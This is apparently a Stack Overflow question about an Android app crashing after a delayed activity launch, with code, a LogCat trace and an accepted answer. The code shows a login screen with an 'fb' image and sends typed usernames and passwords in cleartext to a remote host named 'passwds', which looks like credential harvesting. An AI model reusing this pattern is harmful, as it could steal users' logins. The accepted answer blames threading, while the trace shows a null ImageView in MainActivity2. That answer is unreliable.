# Why is my app is crashing while using async task?

Tags: java, android, android-studio, android-asynctask

I have used asynctask for the first time. I also used a thread to automatically start a new activity after some time in the same activity.

Android studio shows no error in codes but my app crashes if I login or wait for my new activity to begin.

It is a test app for me using asynctask & connecting with my MySQL.

My code:

```
public class MainActivity extends AppCompatActivity {
    EditText bQ,bR;


    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Thread thread=new Thread(){
            @Override
            public void run() {
                try {
                    sleep(5*1000);
                    Intent i = new Intent(getApplicationContext(),MainActivity2.class);
                    startActivity(i);
                }
                catch (Exception ex)
                {}
            }
        };
        thread.start();


        ImageView ImageView = (ImageView) findViewById(R.id.imageView);
        ImageView.setImageResource(R.drawable.fb);

        bQ = (EditText)findViewById(R.id.username);
        bR = (EditText)findViewById(R.id.password);
    }

    public void insertIntoDatabase() {
        final String username = bQ.getText().toString();
        final String password = bR.getText().toString();

        class SendPostReqAsyncTask extends AsyncTask<String, Void, String> {
            @Override
            protected String doInBackground(String... params) {
                String paramUsername = params[0];
                String paramPassword = params[1];

                try {
                    URL url = new URL("http://passwds.esy.es/upload.php");
                    HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
                    httpURLConnection.setRequestMethod("POST");
                    httpURLConnection.setDoOutput(true);
                    httpURLConnection.setDoInput(true);
                    //OutputStream outputStream = httpURLConnection.getOutputStream();
                    BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(httpURLConnection.getOutputStream(), "UTF-8"));
                    String userPass = URLEncoder.encode("username", "UTF-8") + "=" + URLEncoder.encode(paramUsername, "UTF-8") + "&"
                            + URLEncoder.encode("password", "UTF-8") + "=" + URLEncoder.encode(paramPassword, "UTF-8");
                    bufferedWriter.write(userPass);
                    bufferedWriter.flush();
                    bufferedWriter.close();

                    InputStream inputStream = httpURLConnection.getInputStream();
                    inputStream.close();
                    httpURLConnection.disconnect();
                } catch (IOException e) {
                    e.printStackTrace();
                }
                return "success";
            }
            @Override
            protected void onPostExecute(String result) {
                super.onPostExecute(result);
                Log.v("Result:", result);
            }
        }
        SendPostReqAsyncTask sendPostReqAsyncTask = new SendPostReqAsyncTask();
        sendPostReqAsyncTask.execute(username, password);
    }
    public void submit(View view) {
        insertIntoDatabase();
    }
}
```

LogCat:

```
04-08 09:54:30.929 6707-6707/? I/art: Late-enabling -Xcheck:jni
04-08 09:54:30.957 6707-6714/? I/art: Debugger is no longer active
04-08 09:54:30.957 6707-6714/? I/art: Starting a blocking GC Instrumentation
04-08 09:54:30.986 6707-6707/? D/LenovoAppIconTheme: ExtraResources;cleanCachedIcon;clear cache..
04-08 09:54:31.145 6707-6707/? W/System: ClassLoader referenced unknown path: /data/app/com.books.admin.foxbooks-1/lib/arm
04-08 09:54:31.159 6707-6707/? I/InstantRun: starting instant run server: is main process
04-08 09:54:31.246 6707-6707/? W/art: Before Android 4.1, method android.graphics.PorterDuffColorFilter android.support.graphics.drawable.VectorDrawableCompat.updateTintFilter(android.graphics.PorterDuffColorFilter, android.content.res.ColorStateList, android.graphics.PorterDuff$Mode) would have incorrectly overridden the package-private method in android.graphics.drawable.Drawable
04-08 09:54:31.297 6707-6707/? V/BoostFramework: mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int[])
04-08 09:54:31.297 6707-6707/? V/BoostFramework: mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease()
04-08 09:54:31.297 6707-6707/? V/BoostFramework: mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTouch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[])
04-08 09:54:31.297 6707-6707/? V/BoostFramework: mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,java.lang.String)
04-08 09:54:31.298 6707-6707/? V/BoostFramework: mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop()
04-08 09:54:31.300 6707-6707/? V/BoostFramework: BoostFramework() : mPerf = com.qualcomm.qti.Performance@cb8650
04-08 09:54:31.300 6707-6707/? V/BoostFramework: BoostFramework() : mPerf = com.qualcomm.qti.Performance@b74c049
04-08 09:54:31.529 6707-6727/? I/Adreno: QUALCOMM build                   : c6f59fa, Ie9c95840c4
                                         Build Date                       : 06/16/17
                                         OpenGL ES Shader Compiler Version: XE031.09.00.03
                                         Local Branch                     : 
                                         Remote Branch                    : refs/tags/AU_LINUX_ANDROID_LA.UM.5.5.R1.07.00.00.269.021
                                         Remote Branch                    : NONE
                                         Reconstruct Branch               : NOTHING
04-08 09:54:31.535 6707-6727/? I/OpenGLRenderer: Initialized EGL, version 1.4
04-08 09:54:31.535 6707-6727/? D/OpenGLRenderer: Swap behavior 1
04-08 09:54:31.571 6707-6707/? W/art: Before Android 4.1, method int android.support.v7.widget.ListViewCompat.lookForSelectablePosition(int, boolean) would have incorrectly overridden the package-private method in android.widget.ListView
04-08 09:54:36.623 6707-6707/com.books.admin.foxbooks V/BoostFramework: BoostFramework() : mPerf = com.qualcomm.qti.Performance@633747d
04-08 09:54:36.623 6707-6707/com.books.admin.foxbooks V/BoostFramework: BoostFramework() : mPerf = com.qualcomm.qti.Performance@714df72
04-08 09:54:36.794 6707-6707/com.books.admin.foxbooks D/AndroidRuntime: Shutting down VM
04-08 09:54:36.795 6707-6707/com.books.admin.foxbooks E/AndroidRuntime: FATAL EXCEPTION: main
                                                                        Process: com.books.admin.foxbooks, PID: 6707
                                                                        java.lang.RuntimeException: Unable to start activity ComponentInfo{com.books.admin.foxbooks/com.books.admin.foxbooks.MainActivity2}: java.lang.NullPointerException: Attempt to invoke virtual method 'void android.widget.ImageView.setImageResource(int)' on a null object reference
                                                                            at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2646)
                                                                            at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2707)
                                                                            at android.app.ActivityThread.-wrap12(ActivityThread.java)
                                                                            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1460)
                                                                            at android.os.Handler.dispatchMessage(Handler.java:102)
                                                                            at android.os.Looper.loop(Looper.java:154)
                                                                            at android.app.ActivityThread.main(ActivityThread.java:6077)
                                                                            at java.lang.reflect.Method.invoke(Native Method)
                                                                            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:865)
                                                                            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:755)
                                                                         Caused by: java.lang.NullPointerException: Attempt to invoke virtual method 'void android.widget.ImageView.setImageResource(int)' on a null object reference
                                                                            at com.books.admin.foxbooks.MainActivity2.onCreate(MainActivity2.java:21)
                                                                            at android.app.Activity.performCreate(Activity.java:6705)
                                                                            at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1119)
                                                                            at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2599)
                                                                            at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2707) 
                                                                            at android.app.ActivityThread.-wrap12(ActivityThread.java) 
                                                                            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1460) 
                                                                            at android.os.Handler.dispatchMessage(Handler.java:102) 
                                                                            at android.os.Looper.loop(Looper.java:154) 
                                                                            at android.app.ActivityThread.main(ActivityThread.java:6077) 
                                                                            at java.lang.reflect.Method.invoke(Native Method) 
                                                                            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:865) 
                                                                            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:755)
```

Comment: Please, edit your question and copy paste your code. Don't use images. Also copy paste the error message you get when the application crashes.

Comment: sry guys. I have editted my post.

Answer (score 0, accepted):

You are Calling Activity in a Background Thread Thats Why you are getting Error
You Need to Call Like this

```
    Thread thread=new Thread(){
        @Override
        public void run() {
            try {
                sleep(5*1000);
                runOnUiThread(new Runnable() {
                    @Override
                    public void run() {
                        Intent i = new Intent(getApplicationContext(),MainActivity2.class);
                        startActivity(i);
                    }
                });

            }
            catch (Exception ex)
            {}
        }
    };
    thread.start();
```